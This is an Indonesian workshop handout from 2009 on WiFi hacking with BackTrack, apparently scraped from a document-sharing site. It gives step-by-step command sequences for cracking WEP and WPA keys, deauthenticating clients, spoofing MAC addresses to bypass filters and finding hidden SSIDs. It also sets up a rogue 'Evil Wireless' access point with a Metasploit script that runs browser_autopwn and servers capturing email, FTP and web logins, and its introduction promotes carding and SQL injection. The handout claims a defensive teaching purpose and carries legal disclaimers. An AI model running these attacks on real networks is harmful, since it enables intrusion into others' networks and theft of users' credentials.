materi workshop wifi hacking with backtrack unair des 2009

28
Wireless Hacking, Web Hacking & Security System Oleh : Nathan Gusti Ryan We give you Solution with our eXPerience We give you Solution with our eXPerience We give you Solution with our eXPerience We give you Solution with our eXPerience IT Training – Software – Hardware – Technical Support – Networking – Server System Website : www.xp-solution.com Email : [email protected]

Upload: nur-hamid

Post on 28-Nov-2015

58 views

Category:

Documents


9 download

TRANSCRIPT

Page 1: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

Wireless Hacking, Web Hacking

&

Security System

Oleh :

Nathan Gusti Ryan

We give you Solution with our eXPerience We give you Solution with our eXPerience We give you Solution with our eXPerience We give you Solution with our eXPerience

IT Training – Software – Hardware – Technical Support – Networking – Server System

Website : www.xp-solution.com Email : [email protected]

Page 2: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

About Workshop Wifi Hacking

Materi ini merupakan kelanjutan dari Seminar “Networking Security” yang dibawakan oleh Pakar IT Nasional

Bpk Onno. W. Purbo di Universitas Airlangga tanggal 29 November 2009. Materi Wifi Hacking ini sebagai

Workshop dari Demo yang dibawakan dalam Seminar tersebut.

Workshop atau Pelatihan Hacking bertujuan untuk mempelajari dan mendalami serta mempaktekkan System

Kerja atau Teknik Kerja seorang Hacker dalam menemukan celah keamanan atau Hole security suatu jaringan

wireless milik orang lain. Pengetahuan dan wawasan tentang Wifi Hacking ini diharapkan dapat menjadi

pengetahuan peserta workshop sehingga mampu menutup celah keamanan yang dapat diterobos oleh hacker

atau oleh orang lain sehingga Wireless Network atau Jaringan kerja yang dibangunnya betul – betul jaringan

yang kuat proteksi keamanannya.

Simplenya adalah cara menjadi seorang polisi yang handal tentu harus memahami berbagai teknik kejahatan

yang dilakukan oleh penjahat yang handal. Sehingga mampu memberikan perlindungan dan menjaga

keamanan serta mampu meng-identifikasikan + menangkal + menangkap penjahat tersebut.

Dalam Workshop ini di focuskan pada pengunaan Linux BackTrack, baik BackTrack versi 4 maupun BackTrack

versi 3 Bootable USB Flashdisk. BackTrack @ Flasdisk sangat simple dan praktis sehingga dapat digunakan

setiap saat tanpa menganggu OS Laptop yang kita gunakan.

About Internet & Websites Hacking

Materi Workshop Hacking ini sebagai preview adanya berbagai celah keamanan yang memungkinkan sebuah

websites dapat di ambil alih oleh orang lain dengan SQL Injection yang memanfaatkan paramater dari

Database SQL sehingga hacker dapat memperoleh Username + Password ADMIN atau meng-“inject” Username

+ Password yang dapat menguasai websites tersebut.

Carding dan SQL Injection Database Hacking

eCommerce yang semakin berkembang dalam transaksi perdagangan via internet yang menjadikan eMoney

atau Virtual Money semakin diminati dan terus melejit semacam Paypal karena banyak dibutuhkan dalam

bisnis di internet. Begitu juga transaksi mengunakan Kartu Kredit yang memungkinkan adanya celah keamanan

dalam eCommerce sehingga para pemain bisnis internet harus lebih waspada. Hal inilah yang mengharuskan

setiap orang memahami adanya berbagai Teknik Carding maupun SQL Injection terhadap data transaksi

sehingga dapat merugikan pihak lain.

By Nathan Gusti Ryan

http://artikel.xcode.or.id # http://jamesbond.xcode.or.id

www.xp-solution.com

Page 3: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

Joomla Hacking

Joomla Click Jacking adalah berbagai Trik yang memungkinkan menjadi hole dari websites yang dibangun

dengan Websites Joomla CMS sehingga berbagai hal yang dapat menembus Administrator Joomla.

Membuat BackTrack Bootable USB FD

Cara membuat Bootable USB FD sangat lah mudah.

1. Buka File ISO BackTrack USB dengan MagicISO atau PowerISO.

2. Copy-kan semua file dari ISO tersebut ke sebuah Flashdisk 1 GB Format yang telah di format.

3. Keluar dari program MagicISO atau PowerISO lalu buka flashdisk tersebut dengan Windows Explorer.

4. Jalankan file “BOOTINST.BAT”, dan setelah selesai maka Bootable Flashdisk siap digunakan.

Page 4: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

Page 5: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

TAHAPAN WIFI HACKING

Tahapan yang harus dilakukan untuk Hacking Wifi adalah sbb :

1. AirMonitoring / AirScanning.

2. AirCapturing / AiroDump.

3. AirCracking.

4. AirConnecting.

5. AddOn : Mac Clonning.

Pertama kita cek dulu status driver wifi kita dengan perintah "airmon-ng"

Fungsinya untuk => cek wifi device & driver

Terlihat driver wireless adapter kita sebagai wifi0. Selanjutnya kita jika ada interface lain seperti ath0, kita

hapus dengan perintah "airmon-ng stop ath0"

Fungsinya untuk => menghentikan koneksi eksisting dan virtual driver interface wifi ath0

Selanjutnya kita cek lagi driver wifi yang masih eksis dengan perintah "airmon-ng"

Page 6: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

Sekarang kita akan buat virtual wifi interface dengan perintah "airmon-ng start wifi0"

Fungsinya untuk => menciptakan sebuah virtual wifi interface dari wireless interface wifi0

Nah setelah tercipta virtual wifi interface dengan nama ath0, maka selanjutnya kita akan melakukan scanning

wifi network yang ada disekitar kita dengan perintah "airodump-ng ath0"

Fungsinya untuk => perintah untuk melakukan scanning wifi network yg ada disekitar kita.

Page 7: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

Selanjutnya muncul daftar Wifi Network / BSSID, Power, Mac Address AP / ESSID, Channel yang digunakan

masing2 AP, Bandwith Speed, Jenis Enkripsi (WEP, OPN, WPA, WPA2), Jenis Authentikasi (PSK, TKIP), Nama

Wifi Network / ESSID.

=> Serta muncul muncul Mac Address ESSID dan Mac Address Station / Client yg sedang Connect

#airodump-ng ath0

CH 7 ] [ Elapsed: 16 s ] [ 2009-12-01 18:31

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1E:E5:99:E1:3E 47 5 0 0 13 54. WPA2 CCMP PSK BhiNetwork-Linksys-IT 00:1A:70:95:AB:1A 19 25 0 0 6 54. WPA TKIP PSK BhiNetwork-Linksys 00:C0:02:FF:F1:AC 59 34 18 0 1 11 WEP WEP FREE-HOTSPOT

BSSID STATION PWR Rate Lost Packets Probes

00:C0:02:FF:F1:AC 00:1D:0F:BA:DA:2D 54 0-11 0 1 FREE-HOTSPOT

=> perintah ini untuk melakukan proses scanning wifi network channel 1 / airodump serta mencatat semua

paket data di channel 1 tsb.

#airodump-ng --channel 1 --bssid 00:11:22:33:44:55 -w hasilcap ath0

--channel 1 => Channel yang ditampilkan

--bssid 00:11:22:33:44:55 => Mac Address dari AP yang ditampilkan

-w hasilcap => file output dari hasil scanning

ath0 => virtual wifi interface

--ivs => format penyimpanan hasil capture sebagai file ivs

Page 8: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

Page 9: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 #aircrack-ng hasilcap.cap

Fungsinya => untuk menganalisa hasil capture packet dari airdump.

Page 10: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 Kita juga bisa melakukan monitoring jaringan wireless ini mengunakan Kismet

Selanjutnya kita akan melihat Client yang terkoneksi ke Access Point ini :

Tekan space

S - untuk men-sort

S - untuk men-sort terhadap SSID

Tekan Panah Bawah - Letakan di SSID AP yang kita inginkan.

ENTER - detail AP

C - lihat siapa saja client AP tersebut

Selanjutnya akan terlihat daftar Client seperti dibawah ini :

Page 11: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

Page 12: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 AIREPLAY

bt ~ # aireplay-ng Aireplay-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas d'Otreppe Original work: Christophe Devine http://www.aircrack-ng.org usage: aireplay-ng <options> <replay interface> Filter options: -b bssid : MAC address, Access Point -d dmac : MAC address, Destination -s smac : MAC address, Source -m len : minimum packet length -n len : maximum packet length -u type : frame control, type field -v subt : frame control, subtype field -t tods : frame control, To DS bit -f fromds : frame control, From DS bit -w iswep : frame control, WEP bit -D : disable AP detection Replay options: -x nbpps : number of packets per second -p fctrl : set frame control word (hex) -a bssid : set Access Point MAC address -c dmac : set Destination MAC address -h smac : set Source MAC address -g value : change ring buffer size (default: 8) -F : choose first matching packet Fakeauth attack options: -e essid : set target AP SSID -o npckts : number of packets per burst (0=auto, default: 1) -q sec : seconds between keep-alives -y prga : keystream for shared key auth Arp Replay attack options: -j : inject FromDS packets Fragmentation attack options: -k IP : set destination IP in fragments -l IP : set source IP in fragments Test attack options: -B : activates the bitrate test source options: -i iface : capture packets from this interface -r file : extract packets from this pcap file attack modes (Numbers can still be used): --deauth count : deauthenticate 1 or all stations (-0)

Page 13: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 --fakeauth delay : fake authentication with AP (-1) --interactive : interactive frame selection (-2) --arpreplay : standard ARP-request replay (-3) --chopchop : decrypt/chopchop WEP packet (-4) --fragment : generates valid keystream (-5) --caffe-latte : query a client for new IVs (-6) --cfrag : fragments against a client (-7) --test : tests injection and quality (-9) --help : Displays this usage screen ############

#aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 01:12:23:34:45:56 ath0

-b => MAC AP / BSSID

-h => MAC Source / MAC Wifi kita

-c / -d => MAC Client / Destination

ath0 => virtual wifi interface

Fungsinya => Untuk mempercepat proses pengiriman packet data dari Client ke AP

Page 14: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

Deauthentikasi Aireplay :

Fungsinya => Untuk menghentikan koneksi dari Client ke AP sehingga Airdump dapat melakukan capture dari

koneksi awal dari Client ke AP.

=> (Serangan utk Disconnect & Reconnect koneksi suatu client ke AP)

#aireplay-ng --deauth 10 -a 00:80:48:7E:CC:57 -c 02:19:FC:01:00:C4 ath0

10 => jumlah deauthentikasi / penyerangan yang akan dilakukan

-a => MAC AP

-c => MAC Client / Workstation

Menganti Mac Address Interface Wifi :

bt ~ # macchanger -A wifi0

Current MAC: a2:9b:5c:b2:de:70 (unknown)

Faked MAC: 00:e0:06:6f:d4:da (Silicon Integrated Sys. Corp.)

bt ~ # macchanger -s wifi0

Current MAC: 00:e0:06:6f:d4:da (Silicon Integrated Sys. Corp.)

bt ~ # macchanger -m 00:21:63:ad:7c:3a wifi0

Current MAC: 00:21:63:ad:7c:3b (unknown)

Faked MAC: 00:21:63:ad:7c:3a (unknown)

Page 15: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

Menyambung ke HotSpot Untuk menyambungkan diri ke HotSpot menggunakan text mode. Langkah yang biasa digunakan

1. Scanning frekuensi

# iwlist scanning

2. Set ESSID interface wireless (misalnya eth1) agar sama dengan HotSpot

# iwconfig eth1 essid HotSpotSSID

3. Cek apakah sudah tersambung

# iwconfig eth1

4. Minta IP address ke DHCP Server

# dhclient eth1

Beberapa Cara untuk Cek Sambungan

1. Cek apakah routing ke Internet sudah di berikan oleh DHCP Server. Perhatikan IP gateway untuk tujuan 0.0.0.0 apakah sudah di berikan, menggunakan perintah,

# netstat -nr

2. Ping ke gateway HotSpot

# ping <ip-gateway>

Page 16: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

Scanning HotSpot Scanning Keberadaan HotSpot dapat dilakukan menggunakan text mode.

iwlist

Cara yang paling sederhana adalah menggunakan perintah

# iwlist scanning

Kismet

cara yang lebih rumit menggunakan kismet

# apt-get install kismet # vi /etc/kismet/kismet.conf source=none,none,addme --> source=ipw3945,wlan0,ipwsource source=none,none,addme --> source=zd1211,eth1,zysource source=none,none,addme --> source=ath5k, ath0, athsource

Baca http://www.kismetwireless.net/documentation.shtml untuk melihat source yang dikenali Kismet

# kismet

airodump

Mematikan mode monitor di WLAN interface

# airmon-ng stop wlan0

Mengaktifkan mode monitor di WLAN interface

# airmon-ng start wlan0 1

Akan keluar kira-kira

Interface Chipset Driver wlan0 Intel 3945ABG iwl3945 - [phy0] (monitor mode enabled on mon2) mon0 Intel 3945ABG iwl3945 - [phy0] mon1 Intel 3945ABG iwl3945 - [phy0]

Scanning

# airodump-ng mon0

Page 17: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

Teknik Menjebol WEP Menggunakan Airodump dan Aircrack Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.

Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP. Teknik berikut ini membutuhkan traffic paket yang sangat besar, biasanya akan mudah dilakukan jika ada yang sedang melakukan transfer file di jaringan HotSpot. Jika tidak ada traffic sama sekali, sampai kapanpun akan susah untuk di crack WEP-nya.

Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita, dan (3) Channel yang digunakan AP.

Misalnya,

BSSID 00:30:4F:4E:2B:50 WIFI 00:11:6b:33:d3:90 CHANNEL 2

Untuk memudahkan operasi ada baiknya melakukan di shell

export AP=00:30:4F:4E:2B:50 export WIFI=00:11:6b:33:d3:90 export CHANNEL=1

Setup supaya interface WiFi masuk ke mode monitoring menggunakan perintah

airmon-ng start wlan0 1

Biasanya akan tampil kira-kira sebagai berikut

Interface Chipset Driver wlan0 Intel 3945ABG iwl3945 - [phy0] (monitor mode enabled on mon0)

Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0. Kita harus menggunakan interface mon0 untuk melakukan monitor.

Jalankan airodump di WLAN mon0

airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL mon0

Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah

airodump-ng --output-format ivs -w hasilcapture --bssid $AP --channel $CHANNEL mon0

Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..

Page 18: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture. Agar memudahkan proses cracking WEP pastikan kita dapat menangkap lebih dari 5000 paket.

Jalankan aircrack untuk mengcrack WEP

# aircrack-ng -a 1 -e essidapyangakandicrack -n 64 hasilcapture-01.ivs

misalnya

# aircrack-ng -a 1 -e linksys -n 64 hasilcapture-01.ivs # aircrack-ng -a 1 -e $AP -n 64 hasilcapture-01.ivs

Bisa juga menggunakan perintah

# aircrack-ng -a 1 -n 64 hasilcapture-01.ivs

Switch -a 1 digunakan untuk menset aircrack-ng agar meng-crack WEP

Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada yang sedang transfer file di jaringan HotSpot.

Page 19: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

Teknik Menjebol WEP Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.

Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP.

Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita, dan (3) Channel yang digunakan AP.

Misalnya,

BSSID 00:30:4F:4E:2B:50 WIFI 00:11:6b:33:d3:90 CHANNEL 2

Untuk memudahkan operasi ada baiknya melakukan

# export AP=00:30:4F:4E:2B:50 # export WIFI=00:11:6b:33:d3:90 # export CHANNEL=1

Teknik mencari data BSSID & CHANNEL di atas menggunakan perintah, misalnya, card WLAN di eth1. Pastikan bahwa eth1 berada pada mode monitor

# iwconfig eth1 mode monitor # iwconfig eth1 # airmon-ng start eth1 # airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL eth1

Teknik selanjutnya membutuhkan kemampuan untuk berasosiasi dengan Access Point, sayangnya biasanya sukar untuk dapat berasosiasi dengan Access Point yang terenkripsi. Jika ada bug di Access Point, kita bisa lakukan fake authentication seolah-olah kita telah bergabung ke Access Point tersebut

# aireplay-ng -1 0 -e ssidaccesspoint -a $AP -h $WIFI eth1

Jika berhasil authentikasi, kita dapat membuat packet palsu yang akan kita gunakan untuk memanipulasi traffic paket yang lewat dari / menuju access point. Perintah yang digunakan adalah

# aireplay-ng -5 -b $AP -h $WIFI eth1

Setelah kita cukup banyak berhasil menangkap paket. Proses cracking WEP dapat dilakukan menggunakan

# aircrack-ng -a 1 -n 64 hasilcapture.ivs

Page 20: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

Teknik Menjebol WPA Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.

Menjebol WPA hampir tidak mungkin. Tapi kalau anda mau memaksa mencoba-nya bisa mencoba langkah berikut walaupun tidak ada jaminan sama sekali bahwa anda dapat menjebol-nya.

Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita, dan (3) Channel yang digunakan AP.

Misalnya,

BSSID 00:30:4F:4E:2B:50 WIFI 00:11:6b:33:d3:90 CHANNEL 2

Untuk memudahkan operasi ada baiknya melakukan di shell

export AP=00:30:4F:4E:2B:50 export WIFI=00:11:6b:33:d3:90 export CHANNEL=1

Setup supaya interface WiFi masuk ke mode monitoring menggunakan perintah

airmon-ng start wlan0 1

Biasanya akan tampil kira-kira sebagai berikut

Interface Chipset Driver wlan0 Intel 3945ABG iwl3945 - [phy0] (monitor mode enabled on mon0)

Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0. Kita harus menggunakan interface mon0 untuk melakukan monitor.

Jalankan airodump di WLAN mon0

airodump-ng -w hasilcapture --bssid $AP --channel $CHANNEL mon0

Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah

airodump-ng --output-format pcap -w hasilcapture --bssid $AP --channel $CHANNEL mon0

Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..

Untuk mempercepat proses gunakan aireplay-ng

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

Page 21: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

Dimana :

-a MAC AP -c MAC client

Kunci dari proses cracking WPA adalah ketersediaan kamus silahkan di cek ke

http://www.aircrack-ng.org/doku.php?id=faq http://www.aircrack-ng.org/doku.php?id=faq#how_can_i_crack_a_wpa-psk_network http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists

Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture.

Jalankan aircrack untuk meng-crack WPA

# aircrack-ng -w kamuspass.txt -b 00:14:6C:7E:40:80 psk*.cap -b MAC BSSID

Versi yang lebih panjang

# aircrack-ng -a 2 -e essidapyangakandicrack -n 64 hasilcapture* -w kamuspass.txt # aircrack-ng -a 2 -e linksys -n 64 hasilcapture* -w kamuspass.txt # aircrack-ng -a 2 -e $AP -n 64 hasilcapture* -w kamuspass.txt

Bisa juga menggunakan perintah

# aircrack-ng -a 2 -n 64 hasilcapture* -w kamuspass.txt

Switch -a 2 digunakan untuk menset aircrack-ng agar meng-crack WPA

Page 22: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

Menemukan Hidden SSID Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.

Cara yang paling ampuh untuk menemukan Hidden SSID adalah menggunakan kismet

# kismet

Hidden SSID akan berwarna biru dan di tutup oleh tanda <> seperti tampak pada gambar.

tampilan kismet, warna biru adalah Hidden SSID

Bagi anda yang cukup beruntung dapat juga menggunakan cara di bawah ini. Tapi kemungkinan gagal lumayan tinggi.

Pertama, scanning frekuensi pada WLAN di eth1

# airmon-ng stop eth1 # airmon-ng start eth1 # airodump-ng eth1

Jalankan airodump-ng terus menerus di sebuah Windows.

Pada Windows yang lain lakukan aireplay asumsinya AP dengan MAC 00:11:6B:60:86:91 melalui eth1

# aireplay-ng --deauth 1 -a 00:11:6B:60:86:91 eth1

Nanti akan keluar BSSID di airodump-ng

http://opensource.telkomspeedy.com/wiki/index.php/Wireless_Hacking

Page 23: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

Teknik Man-in-The-Middle Attack / FakeAP Contents

1 Versi Singkat membuat Fake AP 2 Versi lengkap untuk MiTM attack 3 Referensi 4 Pranala Menarik

Versi Singkat membuat Fake AP airbase-ng -e "Free WiFi" -P -C 30 -v wlan0

Versi lengkap untuk MiTM attack

Siapkan software yang di butuhkan

sudo apt-get install subversion

Summary perintah yang digunakan

svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng cd aircrack-ng/ make make install sudo su - airmon-ng start wlan0 airbase-ng -e "Evil Wireless" -v mon0 & ifconfig at0 10.0.0.1 netmask 255.255.255.0 apt-get install dhcp3-server vi /etc/dhcp3/evil-wireless.conf option domain-name-servers 10.0.0.1; default-lease-time 60; max-lease-time 72; ddns-update-style none; authoritative; log-facility local7; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; option routers 10.0.0.1; option domain-name-servers 10.0.0.1; } dhcpd3 -cf /etc/dhcp3/evil-wireless.conf ifconfig mon0 mtu 1800 ifconfig at0 mtu 1400 svn co http://metasploit.com/svn/framework3/trunk msf3 (butuh waktu lama & bandwidth)

Menggunakan gems rupanya rewel & belum stabil :( ..

apt-get install rubygems gem install activerecord sqlite3-ruby (butuh waktu lama & bandwidth) vi evilwireless.rc

Page 24: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 load db_sqlite3 db_create /root/evilwireless.db use auxiliary/server/browser_autopwn setg AUTOPWN_HOST 10.0.0.1 setg AUTOPWN_PORT 55550 setg AUTOPWN_URI /ads set LHOST 10.0.0.1 set LPORT 45000 set SRVPORT 55550 set URIPATH /ads run use auxiliary/server/capture/pop3 set SRVPORT 110 set SSL false run use auxiliary/server/capture/pop3 set SRVPORT 995 set SSL true run use auxiliary/server/capture/ftp run use auxiliary/server/capture/imap set SSL false set SRVPORT 143 run use auxiliary/server/capture/imap set SSL true set SRVPORT 993 run use auxiliary/server/capture/smtp set SSL false set SRVPORT 25 run use auxiliary/server/capture/smtp set SSL true set SRVPORT 465 run use auxiliary/server/fakedns unset TARGETHOST set SRVPORT 5353 run use auxiliary/server/fakedns unset TARGETHOST set SRVPORT 53 run use auxiliary/server/capture/http set SRVPORT 80 set SSL false run use auxiliary/server/capture/http set SRVPORT 8080

Page 25: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 set SSL false run use auxiliary/server/capture/http set SRVPORT 443 set SSL true run use auxiliary/server/capture/http set SRVPORT 8443 set SSL true run ./msfconsole -r evilwireless.rc

Referensi

http://forums.remote-exploit.org/backtrack3-howtos/19048-rogue-accesspoint-mitm-sniffing-tutorial.html

http://0x80.org/blog/?p=131 - The Evil Access Point http://forums.remote-exploit.org/wireless/23886-tutorial-how-create-fake-ap-auto-bash-script.html -

How to create Face AP http://ww2.mastaputa.com:9999/?p=29 http://fix-vista.com/windows-vista-installation-setup/fishing-windows-clients-with-airbase-ng-and-

airchat

Page 26: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

Teknik Melewati Pembatasan MAC Address Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.

Sebagian AP akan memfilter MAC address client. Teknik menemukan MAC address client yang di ijinkan lewat oleh AP menggunakan Kismet adalah

# kismet

Lakukan

space S - untuk men-sort S - untuk men-sort terhadap SSID Panah Bawah - Letakan di SSID AP yang kita inginkan. ENTER - detail AP C - lihat siapa saja client AP tersebut

Pastikan airmon tidak aktif di WLAN eth1

# airmon-ng stop eth1

Untuk mengubah MAC address dari WLAN di eth1 menjadi sama dengan MAC address client yang diijinkan AP

# ifconfig eth1 down # ifconfig eth1 hw ether 00:16:CF:C1:FA:F5 # ifconfig eth1 up

Alternatif lain

# ifconfig eth1 down # macchanger -mac 00:16:CF:C1:FA:F5 eth1 # ifconfig eth1 up

atau untuk random MAC address

# macchanger -r eth1

Page 27: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

Aplikasi Yang Perlu Disiapkan Beberapa paket software yang dibutuhkan : # apt-get install gcc g++ linux-kernel-headers libpcap0.8 libpcap0.8-dev libnet1 libnet1-dev libdnet \ libdnet-dev subversion python2.4 python2.4-dev python-pyx python-crypto python-psyco dhcp3-server bind9 apache2

Install beberapa aplikasi yang lebih fokus untuk hacking wireless # apt-get install kismet scapy macchanger ettercap dsniff aircrack-ng

Pada Ubuntu 9.04 aplikasi yang di instalasi adalah # apt-get install kismet python-scapy macchanger ettercap dsniff aircrack-ng

Download source code aplikasi berikut jika diperlukan # cd /usr/local/src # svn co https://802.11ninja.net/svn/lorcon/trunk lorcon # wget http://download.aircrack-ng.org/aircrack-ng-0.9.3.tar.gz # wget http://sid.rstack.org/code/wifitap/wifitap-0.4.0.tgz # wget http://easynews.dl.sourceforge.net/sourceforge/airpwn/airpwn-1.30.tgz

Bagi pengguna Atheros & RT73 perlu mendownload # wget http://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r2277-20070414.tar.gz # wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt2570-k2wrlz-1.6.1.tar.bz2 # wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-1.1.0.tar.bz2

Compile & Install Lorcon # cd /usr/local/src/lorcon/ # ./configure \ -prefix=/usr \ -sysconfdir=/etc/lorcon \ -localstatedir=/var \ -mandir=/usr/share/man\ -infodir=/usr/share/info # make # make install

Sebaiknya di lakukan melalui airpwn seperti di bawah ini, Compile & Install Airpwn # cd /usr/local/src/ # tar zxvf airpwn-1.3.tgz # cd /usr/local/src/airpwn-1.3 # tar zxvf lorcon-current.tgz # cp -Rf /usr/local/src/lorcon/* /usr/local/src/airpwn-1.3/lorcon # cd /usr/local/src/airpwn-1.3/lorcon # ./configure \ -prefix=/usr \ -sysconfdir=/etc/lorcon \ -localstatedir=/var \ -mandir=/usr/share/man\ -infodir=/usr/share/info # make # make install

